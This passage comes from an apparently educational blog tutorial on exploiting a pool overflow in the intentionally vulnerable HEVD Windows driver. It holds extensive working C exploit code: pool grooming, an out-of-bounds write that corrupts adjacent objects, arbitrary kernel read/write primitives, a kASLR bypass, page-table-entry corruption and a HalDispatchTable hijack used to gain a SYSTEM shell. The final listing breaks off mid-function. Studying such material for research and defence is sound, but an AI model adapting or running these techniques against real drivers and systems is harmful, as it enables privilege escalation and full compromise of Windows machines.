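payload.VulnChunkData[0] = 0x4141414141414141;
payload.VulnChunkData[1] = 0x4141414141414141;
payload.PoolHeader       = 0x6b63614802020000;
payload.Padding          = 0x0000000000000000;
payload.CorruptedName    = (ULONG64)mainObject.HelperObjectAddress;  // address of the "main" object

DWORD bytesReturned = 0;
DeviceIoControl(driverHandle, 0x0022204b, &payload, sizeof(payload),
                NULL, 0, &bytesReturned, NULL);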

Setting a breakpoint on the TriggerBufferOverflowNonPagedPoolNx routine in HEVD.sys, and setting an additional breakpoint on the memcpy routine, which performs the pool overflow, we can investigate the contents of the pool.

As seen in the above image, we can clearly see we have flooded the pool with controlled ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects, as well as the “current” chunk - which refers to the vulnerable chunk used in the pool overflow. All of these chunks are prefaced with the Hack tag.

Then, after stepping through execution until the memcpy routine, we can inspect the contents of the next chunk, which is 0x10 bytes after the value in RCX, the destination for the memory copy operation. Remember - our goal is to overwrite the adjacent pool chunks. Stepping through the operation, we can clearly see that we have corrupted the next pool chunk, which is of type ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.

We can validate that the address which was written out-of-bounds is actually the address of the “main”, standalone ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object we created.

Remember - a _POOL_HEADER structure is 0x10 bytes in length. This makes every pool chunk within this kLFH bucket 0x20 bytes in total size. Since we want to overflow adjacent chunks, we need to preserve the pool header. Since we are in the kLFH, we can just hardcode the pool header, as we have proven, to satisfy the pool and to avoid any crashes which may arise as a result of an invalid pool chunk. Additionally, we can corrupt the first 0x10 bytes of the value in RCX, which is the destination address in the memory copy operation, because there are 0x20 bytes in the “vulnerable” pool chunk (which is used in the copy operation). The first 0x10 bytes are the header, and the second half we actually don’t care about, as we are worried about corrupting an adjacent chunk. Because of this, we can set the first 0x10 bytes of the data that is written out of bounds to the hardcoded pool header value, ensuring that the bytes which land on the next chunk preserve its pool header.

We have now successfully performed our out-of-bounds write via the pool overflow and corrupted an adjacent ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object’s Name member (which is dynamically allocated on the pool beforehand at an address we do not control) with an address we do control: the address of the object created previously.

Arbitrary Read Primitive

Although it may not be totally apparent currently, our exploit strategy revolves around our ability to use our pool overflow to write out-of-bounds. Recall that the “Set” and “Get” capabilities in the driver allow us to read and write memory, but not at controlled locations. The location is controlled by the pool chunk allocated for the Name member of an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.

Let’s take a look at the corrupted ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object. The corrupted object is one of the many sprayed objects. We successfully overwrote the Name member of this object with the address of the “main”, or standalone, ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object.

We know that it is possible to set the Name member of an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX structure via the SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function through an IOCTL invocation. Since we are now able to control the value of Name in the corrupted object, let’s see if we can’t abuse this through an arbitrary read primitive.

Let’s break this down. We know that we currently have a corrupted object with a Name member that is set to the value of another object. For brevity, we can recall this from the previous image.

If we now do a “Set” operation on the corrupted object, shown in the dt command, which currently has its Name member set to 0xffffa00ca378c210, it will perform this operation on the Name member. However, we know that the Name member is actually currently set to the address of the “main” object via the out-of-bounds write! This means that performing a “Set” operation on the corrupted object will actually take the address of the main object, since it is set in the Name member, dereference it, and write the contents specified by us. This will cause our main object to then point to whatever we specify, instead of the value of ffffa00ca378c3b0 currently outlined in the memory contents shown by dq in WinDbg. How does this turn into an arbitrary read primitive? Since our “main” object will point to whatever address we specify, the “Get” operation, if performed on the main object, will then dereference the address specified by us and return the value!

In WinDbg, we can “mimic” the “Set” operation as shown.

Performing the “Set” operation on the corrupted object will actually set the value of our main object to whatever we specify from user mode, due to us corrupting the previously random address with the pool overflow vulnerability. At this point, performing the “Get” operation on our main object, since it was set to the value specified by us, would dereference the value and return it to us!
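Putting the two operations together, an arbitrary read helper might look like the sketch below (corruptedObject is the groomed ARW_HELPER_OBJECT_IO whose kernel-side Name now points at the main object, mainObject is the standalone object, and the Set/Get IOCTLs are 0x00222067 and 0x0022206B as described above; the structure definition is the one from the final exploit listing).

unsigned long long arbitraryRead(HANDLE driverHandle,
                                 PARW_HELPER_OBJECT_IO corruptedObject,
                                 PARW_HELPER_OBJECT_IO mainObject,
                                 unsigned long long whereToRead)
{
    DWORD bytesReturned = 0;
    unsigned long long readValue = 0;

    // "Set" on the corrupted object: its kernel-side Name points at the main object,
    // so this copy actually overwrites the main object's Name pointer with whereToRead
    corruptedObject->Name = &whereToRead;
    DeviceIoControl(driverHandle, 0x00222067, corruptedObject, sizeof(*corruptedObject),
                    corruptedObject, sizeof(*corruptedObject), &bytesReturned, NULL);

    // "Get" on the main object: the driver dereferences the planted address and
    // bubbles the value back up to user mode
    mainObject->Name = &readValue;
    DeviceIoControl(driverHandle, 0x0022206B, mainObject, sizeof(*mainObject),
                    mainObject, sizeof(*mainObject), &bytesReturned, NULL);

    return readValue;
}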

At this point we need to identify what our goal is. To comprehensively bypass kASLR, our goal is as follows:

  1. Use the base address of HEVD.sys from the original exploit in part one to provide the offset to the Import Address Table
  2. Supply an IAT entry that points to ntoskrnl.exe to the exploit to be arbitrarily read from (thus obtaining a pointer to ntoskrnl.exe)
  3. Calculate the distance from the pointer to the kernel to obtain the base

We can update our code to outline this. As you may recall, we have groomed the pool with 5000 ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects. However, we did not spray the pool with 5000 “vulnerable” objects. Since we have groomed the pool, we know that the vulnerable object we can arbitrarily write past will end up adjacent to one of the objects used for grooming. Since we only trigger the overflow once, and since we have already set the Name values of all of the grooming objects to 0x9090909090909090, we can simply use the “Get” operation to view each Name member of the objects used for grooming. If one of the objects does not contain NOPs, this indicates that the pool overflow outlined previously, used to corrupt the Name value of an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX, has succeeded.
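That scan can be expressed as the sketch below, assuming helperobjectArray holds the 5000 ARW_HELPER_OBJECT_IO structures used for grooming and the Get IOCTL is 0x0022206B.

// Find which groomed object had its kernel-side Name member corrupted by the overflow
int findCorruptedObject(HANDLE driverHandle)
{
    DWORD bytesReturned = 0;

    for (int i = 0; i < 5000; i++)
    {
        unsigned long long leakedName = 0;

        // Ask HEVD to copy the contents behind the kernel-side Name back to us
        helperobjectArray[i].Name = &leakedName;
        DeviceIoControl(driverHandle, 0x0022206B, &helperobjectArray[i],
                        sizeof(helperobjectArray[i]), &helperobjectArray[i],
                        sizeof(helperobjectArray[i]), &bytesReturned, NULL);

        // Every groomed object was initialized with NOPs; anything else means the
        // overflow replaced this object's Name pointer
        if (leakedName != 0x9090909090909090)
        {
            printf("[+] Corrupted groomed object found at index %d (leaked value: 0x%llx)\n",
                   i, leakedName);
            return i;
        }
    }

    return -1;
}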

After this, we can use the previously mentioned primitive: the “Set” functionality in HEVD, applied to the targeted corrupted object, will “trick” the driver into overwriting what it thinks is the corrupted object’s Name buffer, which is actually the address of the “standalone”/main ARW_HELPER_OBJECT_NON_PAGED_POOL_NX. The overwrite will dereference the standalone object, thus allowing for an arbitrary read primitive, since we can then use the “Get” functionality on the main object afterwards.

We then can add a “press enter to continue” function to our exploit to pause execution after the main object is printed to the screen, as well as the corrupted object used for grooming that resides within the 5000 objects used for grooming.

We then can take the address 0xffff8e03c8d5c2b0, which is the corrupted object, and inspect it in WinDbg. If all goes well, this address should contain the address of the “main” object.

Comparing the Name member to the previous screenshot in which the exploit with the “press enter to continue” statement is in, we can see that the pool corruption was successful and that the Name member of one of the 5000 objects used for grooming was overwritten!

Now, if we were to use the “Set” functionality of HEVD and supply the corrupted ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object that was also used for grooming, at address 0xffff8e03c8d5c2b0, HEVD would use the value stored in Name, dereference it, and overwrite it. This is because HEVD is expecting one of the pool allocations previously showcased for Name pointers, which we do not control. Since we have supplied another address, what HEVD will actually do is perform the overwrite, but this time it will overwrite the pointer we supplied, which is another ARW_HELPER_OBJECT_NON_PAGED_POOL_NX. Since the first member of one of these objects is Name, HEVD will actually write whatever we supply to the Name member of our main object! Let’s view this in WinDbg.

As our exploit showcased, we are using HEVD+0x2038 in this case. This value should be written to our main object.

As you can see, our main object now has its Name member pointing to HEVD+0x2038, which is a pointer to the kernel! After running the full exploit, we have now obtained the base address of HEVD from the previous exploit, and now the base of the kernel via an arbitrary read by way of pool overflow - all from low integrity!

The beauty of this technique of leveraging two objects should be clear now - we do not have to constantly perform overflows of objects in order to perform exploitation. We can now just simply use the main object to read!

Our exploitation technique will be to corrupt the page table entries of our eventual memory page our shellcode resides in. If you are not familiar with this technique, I have two blogs written on the subject, plus one about memory paging. You can find them here: one, two, and three.

For our purposes, we will need the following items arbitrarily read:

  1. nt!MiGetPteAddress+0x13 - this contains the base of the PTEs needed for calculations
  2. PTE bits that make up the shellcode page
  3. [nt!HalDispatchTable+0x8] - used to execute our shellcode. We first need to preserve this address by reading it to ensure exploit stability

Let’s add a routine to address the first issue, reading the base of the page table entries. We can calculate the offset to the function MiGetPteAddress+0x13 and then use our arbitrary read primitive.

Leveraging the exact same method as before, we can see we have defeated page table randomization and have the base of the page table entries in hand!

The next step is to obtain the PTE bits that make up the shellcode page. We will eventually write our shellcode to KUSER_SHARED_DATA+0x800 in kernel mode, which is at a static address of 0xfffff78000000800. We can instrument the routine to obtain this information in C.
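As a sketch, the virtual address of the PTE mapping the shellcode page can be derived from the leaked PTE base with the standard shift-and-mask formula (pteBase is assumed to be the value read from nt!MiGetPteAddress+0x13 with the arbitrary read primitive).

// Compute the virtual address of the PTE that maps a given virtual address
unsigned long long getPteAddress(unsigned long long pteBase,
                                 unsigned long long virtualAddress)
{
    return pteBase + ((virtualAddress >> 9) & 0x7FFFFFFFF8);
}

// Example: the PTE for KUSER_SHARED_DATA+0x800, where the shellcode will live
// unsigned long long shellcodePte = getPteAddress(pteBase, 0xfffff78000000800);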

After running the updated exploit, we can see that we are able to leak the PTE bits for KUSER_SHARED_DATA+0x800, where our shellcode will eventually reside.

Note that the !pte extension in WinDbg was giving me trouble. So, from the debuggee machine, I ran WinDbg “classic” with local kernel debugging (lkd) to show the contents of !pte. Notice the actual virtual address for the PTE has changed, but the contents of the PTE bits are the same. This is due to me rebooting the machine and kASLR kicking in. The WinDbg “classic” screenshot is just meant to outline the PTE contents.

You can view this previous blog of mine to understand the permissions KUSER_SHARED_DATA has, which are write but not execute. The last item we need is the contents of [nt!HalDispatchTable+0x8].

After executing the updated code, we can see we have preserved the value [nt!HalDispatchTable+0x8].

The last item on the agenda is the write primitive, which is 99 percent identical to the read primitive. After writing our shellcode to kernel mode and then corrupting the PTE of the shellcode page, we will be able to successfully escalate our privileges.

Arbitrary Write Primitive

Leveraging the same concepts from the arbitrary read primitive, we can also arbitrarily overwrite 64-bit pointers! Instead of using the “Get” operation in order to fetch the dereferenced contents of the Name value specified by the “corrupted” ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, and then returning this value to the Name value specified by the “main” object, this time we will set the Name value of the “main” object not to a pointer that receives the contents, but to the value we would like to overwrite memory with. In this case, we want to set this value to our shellcode, and then set the Name value of the “corrupted” object to KUSER_SHARED_DATA+0x800, incrementing it as we go.
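The write primitive is a mirror image of the read, as the sketch below shows: first plant the destination address in the main object via the corrupted object, then perform a "Set" on the main object with the value to be written (same assumed names and IOCTLs as the read sketch above).

void arbitraryWrite(HANDLE driverHandle,
                    PARW_HELPER_OBJECT_IO corruptedObject,
                    PARW_HELPER_OBJECT_IO mainObject,
                    unsigned long long whereToWrite,
                    unsigned long long whatToWrite)
{
    DWORD bytesReturned = 0;

    // Point the main object's kernel-side Name member at the destination address
    corruptedObject->Name = &whereToWrite;
    DeviceIoControl(driverHandle, 0x00222067, corruptedObject, sizeof(*corruptedObject),
                    corruptedObject, sizeof(*corruptedObject), &bytesReturned, NULL);

    // "Set" on the main object now dereferences that address and copies our value into it
    mainObject->Name = &whatToWrite;
    DeviceIoControl(driverHandle, 0x00222067, mainObject, sizeof(*mainObject),
                    mainObject, sizeof(*mainObject), &bytesReturned, NULL);
}

// Example: write the 9 QWORDs of shellcode to KUSER_SHARED_DATA+0x800, one at a time
// for (int i = 0; i < 9; i++)
//     arbitraryWrite(driverHandle, &corruptedObject, &mainObject,
//                    0xfffff78000000800 + (i * 8), shellcode[i]);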

From here we can run our updated exploit. Since we have created a loop to automate the writing process, we can see we are able to arbitrarily write the contents of the 9 QWORDS which make up our shellcode to KUSER_SHARED_DATA+0x800!

Awesome! We have now successfully performed the arbitrary write primitive! The next goal is to corrupt the contents of the PTE for the KUSER_SHARED_DATA+0x800 page.

From here we can use WinDbg classic to inspect the PTE before and after the write operation.

Awesome! Our exploit now just needs three more things:

  1. Corrupt [nt!HalDispatchTable+0x8] to point to KUSER_SHARED_DATA+0x800
  2. Invoke ntdll!NtQueryIntervalProfile, which will perform the transition to kernel mode to invoke [nt!HalDispatchTable+0x8], thus executing our shellcode
  3. Restore [nt!HalDispatchTable+0x8] with the arbitrary write primitive

Let’s update our exploit code to perform step one.

After executing the updated code, we can see that we have successfully overwritten nt!HalDispatchTable+0x8 with the address of KUSER_SHARED_DATA+0x800 - which contains our shellcode!

Next, we can add the routine to dynamically resolve ntdll!NtQueryIntervalProfile, invoke it, and then restore [nt!HalDispatchTable+0x8].
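A sketch of that final sequence is below; the NtQueryIntervalProfile_t typedef matches the one at the top of the full exploit listing, while halDispatchEntry and originalHalValue are assumed to hold the address of [nt!HalDispatchTable+0x8] and its preserved original value, and arbitraryWrite is the helper sketched earlier.

// Resolve ntdll!NtQueryIntervalProfile at run time
NtQueryIntervalProfile_t NtQueryIntervalProfile =
    (NtQueryIntervalProfile_t)GetProcAddress(GetModuleHandleA("ntdll.dll"),
                                             "NtQueryIntervalProfile");

if (NtQueryIntervalProfile != NULL)
{
    // The syscall eventually calls through [nt!HalDispatchTable+0x8], which now
    // points at our shellcode in KUSER_SHARED_DATA+0x800
    ULONG interval = 0;
    NtQueryIntervalProfile(0x1234, &interval);

    // Restore [nt!HalDispatchTable+0x8] with the preserved value to keep the system stable
    arbitraryWrite(driverHandle, &corruptedObject, &mainObject,
                   halDispatchEntry, originalHalValue);
}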

The final result is a SYSTEM shell from low integrity!

“…Unless We Conquer, As Conquer We Must, As Conquer We Shall.”

Hopefully you, as the reader, found this two-part series on pool corruption useful! As mentioned in the beginning of this post, we must expect mitigations such as VBS and HVCI to be enabled in the future. ROP is still a viable alternative in the kernel due to the lack of kernel CET (kCET) at the moment (although I am sure this is subject to change). As such, techniques such as the one outlined in this blog post will soon be deprecated, leaving us with fewer options for exploitation than we started with. Data-only attacks are always viable, and there have been more novel techniques mentioned, such as this tweet sent to me by Dmytro, which talks about leveraging ROP to forge kernel function calls even with VBS/HVCI enabled. As the title of this last section of the blog articulates, where there is a will there is a way - and although the bar will be raised, this is only par for the course with exploit development over the past few years. KPP + VBS + HVCI + kCFG/kXFG + SMEP + DEP + kASLR + kCET and many other mitigations will prove very useful for blocking most exploits. I hope that researchers stay hungry and continue to push the limits of these mitigations to find more novel ways to keep exploit development alive!

Peace, love, and positivity :-).

Here is the final exploit code, which is also available on my GitHub:

// HackSysExtreme Vulnerable Driver: Pool Overflow + Memory Disclosure
// Author: Connor McGarr (@33y0re)

#include <windows.h>
#include <stdio.h>

// typedef an ARW_HELPER_OBJECT_IO struct
typedef struct _ARW_HELPER_OBJECT_IO
{
    PVOID HelperObjectAddress;
    PVOID Name;
    SIZE_T Length;
} ARW_HELPER_OBJECT_IO, * PARW_HELPER_OBJECT_IO;

// Create a global array of ARW_HELPER_OBJECT_IO objects to manage the groomed pool allocations
ARW_HELPER_OBJECT_IO helperobjectArray[5000] = { 0 };

// Prepping call to nt!NtQueryIntervalProfile
typedef NTSTATUS(WINAPI* NtQueryIntervalProfile_t)(IN ULONG ProfileSource, OUT PULONG Interval);

// Leak the base of HEVD.sys
unsigned long long memLeak(HANDLE driverHandle)
{
    // Array to manage handles opened by CreateEventA
    HANDLE eventObjects[5000];

    // Spray 5000 objects to fill the new page
    for (int i = 0; i < 5000; i++)
    {
        // Create the objects
        HANDLE tempHandle = CreateEventA(
            NULL,
            FALSE,
            FALSE,
            NULL
        );

        // Assign the handles to the array
        eventObjects[i] = tempHandle;
    }

    // Check to see if the first handle is a valid handle
    if (eventObjects[0] == NULL)
    {
        printf("[-] Error! Unable to spray CreateEventA objects! Error: 0x%lx\n", GetLastError());

        return 0x1;
        exit(-1);
    }
    else
    {
        printf("[+] Sprayed CreateEventA objects to fill holes of size 0x80!\n");

        // Close half of the handles
        for (int i = 0; i < 5000; i += 2)
        {
            BOOL tempHandle1 = CloseHandle(
                eventObjects[i]
            );

            eventObjects[i] = NULL;

            // Error handling
            if (!tempHandle1)
            {
                printf("[-] Error! Unable to free the CreateEventA objects! Error: 0x%lx\n", GetLastError());

                return 0x1;
                exit(-1);
            }
        }

        printf("[+] Poked holes in the new pool page!\n");

        // Allocate UaF Objects in place of the poked holes by just invoking the IOCTL, which will call ExAllocatePoolWithTag for a UAF object
        // kLFH should automatically fill the freed holes with the UAF objects
        DWORD bytesReturned;

        for (int i = 0; i < 2500; i++)
        {
            DeviceIoControl(
                driverHandle,
                0x00222053,
                NULL,
                0,
                NULL,
                0,
                &bytesReturned,
                NULL
            );
        }

        printf("[+] Allocated objects containing a pointer to HEVD in place of the freed CreateEventA objects!\n");

        // Close the rest of the event objects
        for (int i = 1; i <= 5000; i += 2)
        {
            BOOL tempHandle2 = CloseHandle(
                eventObjects[i]
            );

            eventObjects[i] = NULL;

            // Error handling
            if (!tempHandle2)
            {
                printf("[-] Error! Unable to free the rest of the CreateEventA objects! Error: 0x%lx\n", GetLastError());

                return 0x1;
                exit(-1);
            }
        }

        // Array to store the buffer (output buffer for DeviceIoControl) and the base address
        unsigned long long outputBuffer[100];
        unsigned long long hevdBase = 0;

        // Everything is now, theoretically, [FREE, UAFOBJ, FREE, UAFOBJ, FREE, UAFOBJ], barring any more randomization from the kLFH
        // Fill some of the holes, but not all, with vulnerable chunks that can read out-of-bounds (we don't want to fill up all the way to avoid reading from a page that isn't mapped)

        for (int i = 0; i < 100; i++)
        {
            // Return buffer
            DWORD bytesReturned1;

            DeviceIoControl(
                driverHandle,
                0x0022204f,
                NULL,
                0,
                &outputBuffer,
                sizeof(outputBuffer),
                &bytesReturned1,
                NULL
            );

        }

        printf("[+] Successfully triggered the out-of-bounds read!\n");

        // Parse the output
        for (int i = 0; i < 100; i++)
        {
            // Kernel mode address?
            if ((outputBuffer[i] & 0xfffff00000000000) == 0xfffff00000000000)
            {
                printf("[+] Address of function pointer in HEVD.sys: 0x%llx\n", outputBuffer[i]);
                printf("[+] Base address of HEVD.sys: 0x%llx\n", outputBuffer[i] - 0x880CC);

                // Store the variable for future usage
                hevdBase = outputBuffer[i] - 0x880CC;

                // Return the value of the base of HEVD
                return hevdBase;
            }
        }
    }

    // No kernel-mode address was found; return 0 to signal failure
    return 0;
}

// Function used to fill the holes in pool pages
void fillHoles(HANDLE driverHandle)
{
    // Instantiate an ARW_HELPER_OBJECT_IO
    ARW_HELPER_OBJECT_IO tempObject = { 0 };

    // Value to assign the Name member of each ARW_HELPER_OBJECT_IO
    unsigned long long nameValue = 0x9090909090909090;

    // Set the length to 0x8 so that the Name member of an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object allocated in the pool has its Name member allocated to size 0x8, a 64-bit pointer size
    tempObject.Length = 0x8;

    // Bytes returned
    DWORD bytesreturnedFill;

    for (int i = 0; i < 5000; i++)
    {
        // Set the Name value to 0x9090909090909090
        tempObject.Name = &nameValue;

        // Allocate a ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object with a Name member of size 0x8 and a Name value of 0x9090909090909090
        DeviceIoControl(
            driverHandle,
            0x00222063,
            &tempObject,
            sizeof(tempObject),
            &tempObject,
            sizeof(tempObject),
            &bytesreturnedFill,
            NULL
        );

        // Using non-controlled arbitrary write to set the Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object to 0x9090909090909090 via the Name member of each ARW_HELPER_OBJECT_IO
        // This will be used later on to filter out which ARW_HELPER_OBJECT_NON_PAGED_POOL_NX HAVE NOT been corrupted successfully (e.g. their Name member is 0x9090909090909090 still)
        DeviceIoControl(
            driverHandle,
            0x00222067,
            &tempObject,
            sizeof(tempObject),
            &tempObject,
            sizeof(tempObject),
            &bytesreturnedFill,
            NULL
        );

        // After allocating the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects (via the ARW_HELPER_OBJECT_IO objects), assign each ARW_HELPER_OBJECT_IO structures to the global managing array
        helperobjectArray[i] = tempObject;
    }

    printf("[+] Sprayed ARW_HELPER_OBJECT_IO objects to fill holes in the NonPagedPoolNx with ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects!\n");
}

// Fill up the new page within the NonPagedPoolNx with ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects
void groomPool(HANDLE driverHandle)
{
    // Instantiate an ARW_HELPER_OBJECT_IO
    ARW_HELPER_OBJECT_IO tempObject1 = { 0 };

    // Value to assign the Name member of each ARW_HELPER_OBJECT_IO
    unsigned long long nameValue1 = 0x9090909090909090;

    // Set the length to 0x8 so that the Name member of an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object allocated in the pool has its Name member allocated to size 0x8, a 64-bit pointer size
    tempObject1.Length = 0x8;

    // Bytes returned
    DWORD bytesreturnedGroom;

    for (int i = 0; i < 5000; i++)
    {
        // Set the Name value to 0x9090909090909090
        tempObject1.Name = &nameValue1;

        // Allocate a ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object with a Name member of size 0x8 and a Name value of 0x9090909090909090
        DeviceIoControl(
            driverHandle,
            0x00222063,
            &tempObject1,
            sizeof(tempObject1),
            &tempObject1,
            sizeof(tempObject1),
            &bytesreturnedGroom,
            NULL
        );

        // Using non-controlled arbitrary write to set the Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object to 0x9090909090909090 via the Name member of each ARW_HELPER_OBJECT_IO
        // This will be used later on to filter out which ARW_HELPER_OBJECT_NON_PAGED_POOL_NX HAVE NOT been corrupted successfully (e.g. their Name member is 0x9090909090909090 still)
        DeviceIoControl(
            driverHandle,
            0x00222067,
            &tempObject1,
            sizeof(tempObject1),
            &tempObject1,
            sizeof(tempObject1),
            &bytesreturnedGroom,
            NULL
        );

        // After allocating the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects (via the ARW_HELPER_OBJECT_IO objects), assign each ARW_HELPER_OBJECT_IO structures to the global managing array
        helperobjectArray[i] = tempObject1;
    }

    printf("[+] Filled the new page with ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects!\n");
}

// Free every other object in the global array to poke holes for the vulnerable objects
void pokeHoles(HANDLE driverHandle)
{
    // Bytes returned
    DWORD bytesreturnedPoke;

    // Free every other element in the global array managing objects in the new page from grooming
    for (int i = 0; i < 5000; i += 2)
    {
        DeviceIoControl(
            driverHandle,
            0x0022206f,
            &helperobjectArray[i],
            sizeof(helperobjectArray[i]),
            &helperobjectArray[i],
            sizeof(helperobjectArray[i]),
            &bytesreturnedPoke,
            NULL
        );
    }

    printf("[+] Poked holes in the NonPagedPoolNx page containing the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects!\n");
}

// Create the main ARW_HELPER_OBJECT_IO
ARW_HELPER_OBJECT_IO createmainObject(HANDLE driverHandle)
{
    // Instantiate an object of type ARW_HELPER_OBJECT_IO
    ARW_HELPER_OBJECT_IO helperObject = { 0 };

    // Set the Length member which corresponds to the amount of memory used to allocate a chunk to store the Name member eventually
    helperObject.Length = 0x8;

    // Bytes returned
    DWORD bytesReturned2;

    // Invoke CreateArbitraryReadWriteHelperObjectNonPagedPoolNx to create the main ARW_HELPER_OBJECT_NON_PAGED_POOL_NX
    DeviceIoControl(
        driverHandle,
        0x00222063,
        &helperObject,
        sizeof(helperObject),
        &helperObject,
        sizeof(helperObject),
        &bytesReturned2,
        NULL
    );

    // Parse the output
    printf("[+] PARW_HELPER_OBJECT_IO->HelperObjectAddress: 0x%p\n", helperObject.HelperObjectAddress);
    printf("[+] PARW_HELPER_OBJECT_IO->Name: 0x%p\n", helperObject.Name);
    printf("[+] PARW_HELPER_OBJECT_IO->Length: 0x%zu\n", helperObject.Length);

    return helperObject;
}

// Read/write primitive
void readwritePrimitive(HANDLE driverHandle)
{
    // Store the value of the base of HEVD
    unsigned long long hevdBase = memLeak(driverHandle);

    // Store the main ARW_HELPER_OBJECT_IO
    ARW_HELPER_OBJECT_IO mainObject = createmainObject(driverHandle);

    // Fill the holes
    fillHoles(driverHandle);

    // Groom the pool
    groomPool(driverHandle);

    // Poke holes
    pokeHoles(driverHandle);

    // Use buffer overflow to take "main" ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object's Name value (managed by ARW_HELPER_OBJECT_IO.Name) to overwrite any of the groomed ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name values
    // Create a buffer that first fills up the vulnerable chunk of 0x10 (16) bytes
    unsigned long long vulnBuffer[5];
    vulnBuffer[0] = 0x4141414141414141;
    vulnBuffer[1] = 0x4141414141414141;

    // Hardcode the _POOL_HEADER value for a ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object
    vulnBuffer[2] = 0x6b63614802020000;

    // Padding
    vulnBuffer[3] = 0x4141414141414141;

    // Overwrite any of the adjacent ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object's Name member with the address of the "main" ARW_HELPER_OBJECT_NON_PAGED_POOL_NX (via ARW_HELPER_OBJECT_IO.HelperObjectAddress)
    vulnBuffer[4] = (unsigned long long)mainObject.HelperObjectAddress;

    // Bytes returned
    DWORD bytesreturnedOverflow;
    DWORD bytesreturnedreadPrimtitve;

    printf("[+] Triggering the out-of-bounds-write via pool overflow!\n");

    // Trigger the pool overflow
    DeviceIoControl(
        driverHandle,
        0x0022204b,
        &vulnBuffer,
        sizeof(vulnBuffer),
        &vulnBuffer,
        0x28,
        &bytesreturnedOverflow,
        NULL
    );

    // Find which "groomed" object was overflowed
    int index = 0;
    unsigned long long placeholder = 0x9090909090909090;

    // Loop through every groomed object to find out which Name member was overwritten with the main ARW_HELPER_NON_PAGED_POOL_NX object
    for (int i = 0; i < 5000; i++)
    {
        // The placeholder variable will be overwritten. Get operation will overwrite this variable with the real contents of each object's Name member
        helperobjectArray[i].Name = &placeholder;

        DeviceIoControl(
            driverHandle,
            0x0022206b,
            &helperobjectArray[i],
            sizeof(helperobjectArray[i]),
            &helperobjectArray[i],
            sizeof(helperobjectArray[i]),
            &bytesreturnedreadPrimtitve,
            NULL
        );

        // Loop until a Name value other than the original NOPs is found
        if (placeholder != 0x9090909090909090)
        {
            printf("[+] Found the overflowed object overwritten with main ARW_HELPER_NON_PAGED_POOL_NX object!\n");
            printf("[+] PARW_HELPER_OBJECT_IO->HelperObjectAddress: 0x%p\n", helperobjectArray[i].HelperObjectAddress);

            // Assign the index
            index = i;

            printf("[+] Array index of global array managing groomed objects: %d\n", index);

            // Break the loop
            break;
        }
    }

    // IAT entry from HEVD.sys which points to nt!ExAllocatePoolWithTag
    unsigned long long ntiatLeak = hevdBase + 0x2038;

    // Print update
    printf("[+] Target HEVD.sys address with pointer to ntoskrnl.exe: 0x%llx\n", ntiatLeak);

    // Assign the target address to the corrupted object
    helperobjectArray[index].Name = &ntiatLeak;

    // Set the Name member of the "corrupted" object managed by the global array. The main object is currently set to the Name member of one of the sprayed ARW_HELPER_OBJECT_NON_PAGED_POOL_NX that was corrupted via the pool overflow
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &helperobjectArray[index],
        sizeof(helperobjectArray[index]),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Declare variable that will receive the address of nt!ExAllocatePoolWithTag and initialize it
    unsigned long long ntPointer = 0x9090909090909090;

    // Setting the Name member of the main object to the address of the ntPointer variable. When the Name member is dereferenced and bubbled back up to user mode, it will overwrite the value of ntPointer
    mainObject.Name = &ntPointer;

    // Perform the "Get" operation on the main object, which should now have the Name member set to the IAT entry from HEVD
    DeviceIoControl(
        driverHandle,
        0x0022206b,
        &mainObject,
        sizeof(mainObject),
        &mainObject,
        sizeof(mainObject),
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Print the pointer to nt!ExAllocatePoolWithTag
    printf("[+] Leaked ntoskrnl.exe pointer! nt!ExAllocatePoolWithTag: 0x%llx\n", ntPointer);

    // Assign a variable the base of the kernel (static offset)
    unsigned long long kernelBase = ntPointer - 0x9b3160;

    // Print the base of the kernel
    printf("[+] ntoskrnl.exe base address: 0x%llx\n", kernelBase);

    // Assign a variable with nt!MiGetPteAddress+0x13
    unsigned long long migetpteAddress = kernelBase + 0x222073;

    // Print update
    printf("[+] nt!MiGetPteAddress+0x13: 0x%llx\n", migetpteAddress);

    // Assign the target address to the corrupted object
    helperobjectArray[index].Name = &migetpteAddress;

    // Set the Name member of the "corrupted" object managed by the global array to obtain the base of the PTEs
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &helperobjectArray[index],
        sizeof(helperobjectArray[index]),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Declare a variable that will receive the base of the PTEs
    unsigned long long pteBase = 0x9090909090909090;

    // Setting the Name member of the main object to the address of the pteBase variable
    mainObject.Name = &pteBase;

    // Perform the "Get" operation on the main object
    DeviceIoControl(
        driverHandle,
        0x0022206b,
        &mainObject,
        sizeof(mainObject),
        &mainObject,
        sizeof(mainObject),
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Print update
    printf("[+] Base of the page table entries: 0x%llx\n", pteBase);

    // Calculate the PTE page for our shellcode in KUSER_SHARED_DATA
